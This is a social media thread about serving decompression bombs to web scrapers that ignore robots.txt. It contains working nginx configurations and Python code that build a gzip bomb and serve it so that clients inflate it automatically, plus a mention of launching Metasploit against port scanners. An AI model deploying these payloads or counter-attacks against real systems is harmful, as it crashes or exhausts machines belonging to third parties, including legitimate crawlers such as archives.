Conversation

web scrapers have gotten really good at working around passive countermeasures such as captchas, ip blocking and rate limiting

i have yet to see any scraper able to deal with decompression bombs, however

it's time to be downright hostile to companies and techbros' bullshit if you ask me

https://git.arielaw.ar/arisunz/ir34

Edit: if you can't (or don't want to) host your own instance, you can use mine at boom [dot] arielaw [dot] ar

@arisunz I really enjoy hearing ideas for offensive defense :)

Like when I used to have nmap scans and metasploit kick off against a machine that attempted a port scan :D

@arisunz the name of your software is genius. I am in awe. You win so much. 😂

@arisunz evil technique i learned from @sasha

location /wp-login.php {
    # redirect bots probing for WordPress logins to a huge speed-test file
    return 301 "http://speed.hetzner.de/10GB.bin";
}

@arisunz Seriously? Not handling the equivalent of zip bombs in >2020?

@0x2ba22e11 people say naming stuff is one of the hardest things in computer science

I say we just need to up our shitposting levels a bit

@Dracodare (oh, you caught a typo, thanks!)

A decompression* bomb is basically a seemingly small compressed file, such as a zip or gz, that grows to a ridiculous size when you try to decompress it. A common example is a 10 MB zip file decompressing to a 10 GB one. Trying to decompress these files crashes the process doing so at best, and brings the system to its knees at worst.
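
You can see the asymmetry with a few lines of Python (just a sketch; the sizes here are arbitrary):

```python
import gzip
import io

# Build a gzip stream that inflates to ~100 MB of zeros.
# Zeros compress extremely well, so the payload itself stays tiny.
INFLATED_SIZE = 100 * 1024 * 1024   # 100 MB once decompressed
CHUNK = b"\x00" * (1024 * 1024)     # write 1 MB of zeros at a time

buf = io.BytesIO()
with gzip.GzipFile(fileobj=buf, mode="wb", compresslevel=9) as gz:
    for _ in range(INFLATED_SIZE // len(CHUNK)):
        gz.write(CHUNK)

bomb = buf.getvalue()
print(f"compressed: {len(bomb)} bytes, decompressed: {INFLATED_SIZE} bytes")
```

Anything that naively decompresses that into memory eats the full 100 MB — and real bombs go much bigger.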

@arisunz >to read more about this technique, google “inflation rule 34”.

@arisunz this is maybe one of my favorite threads of all time

@arisunz
Omg, I love it!

I use this to serve an endless hellscape to unruly bots: https://github.com/yunginnanet/HellPot

@arisunz would this fuck up things like the wayback machine? does it matter?

@arisunz I really really really like this, though I am kind of wondering, wouldn't bots that ignore robots.txt bypass this easily? I've been looking for ways to disallow all scrapers on my sites but those are the ones I'd like to fuck with in particular

@anova that's exactly what this is for though! bots that get to this service and ignore robots.txt get a decompression bomb for lunch
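
for the curious, one way to wire up a trap like that yourself (a rough sketch — the /trap/ path and file names are hypothetical, this isn't how ir34 is actually configured):

```text
# robots.txt — well-behaved crawlers will never touch the trap
User-agent: *
Disallow: /trap/
```

```nginx
# nginx — serve a pre-built gzip bomb at the forbidden path
location /trap/ {
    gzip off;                          # don't re-compress the payload
    add_header Content-Encoding gzip;  # clients inflate it on receipt
    default_type text/html;
    alias /var/www/bombs/;             # contains e.g. bomb.gz
}
```

only bots that ignore robots.txt ever fetch it.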

@arisunz Ah, cool, must have missed that! This is absolutely getting introduced in my next project. Thank you for your service to the butlerian jihad.

@arisunz
to read more about this technique, google "inflation rule 34".

>:|

@oreolek @arisunz @sasha okay, I will use this evil technique, but I will make it an html file

@oreolek @arisunz @sasha oh my god this is going in my nginx config lmao


okay first bit of sysadmin i'm doing in the last several months

@jet it might, not sure if they're honoring robots.txt (they fucking should)

@arisunz yeah, now that I think about it, I'm sure they do, so it's a bit moot. I just work daily with people who are doing web scraping for imo good reasons, so I had a knee-jerk moment.

@oreolek @arisunz @sasha if they check the redirect target, you can also use https://opensource.zalando.com/skipper/reference/filters/#wrapcontenthex to create a gzip bomb that saves your bandwidth and will likely explode when their HTTP client automatically decompresses the "content".
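
same trick in a few lines of Python, for anyone not running skipper (a sketch — the sizes, port, and handler names are mine, not from any of the tools above):

```python
import gzip
import io
from http.server import BaseHTTPRequestHandler, HTTPServer

def build_bomb(inflated_size: int = 10 * 1024 * 1024) -> bytes:
    """Gzip `inflated_size` bytes of zeros into a tiny payload."""
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb", compresslevel=9) as gz:
        gz.write(b"\x00" * inflated_size)
    return buf.getvalue()

BOMB = build_bomb()

class BombHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        # The trick: declare the body as gzip, so clients that
        # transparently decompress responses inflate the full payload
        # on arrival while we only ever send the compressed bytes.
        self.send_header("Content-Encoding", "gzip")
        self.send_header("Content-Length", str(len(BOMB)))
        self.end_headers()
        self.wfile.write(BOMB)

# to serve it (blocks forever):
#   HTTPServer(("127.0.0.1", 8080), BombHandler).serve_forever()
```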

@sszuecs @oreolek @arisunz @sasha

Zip bombs: Bombing bad actors while saving network resources.

Go gr33n.
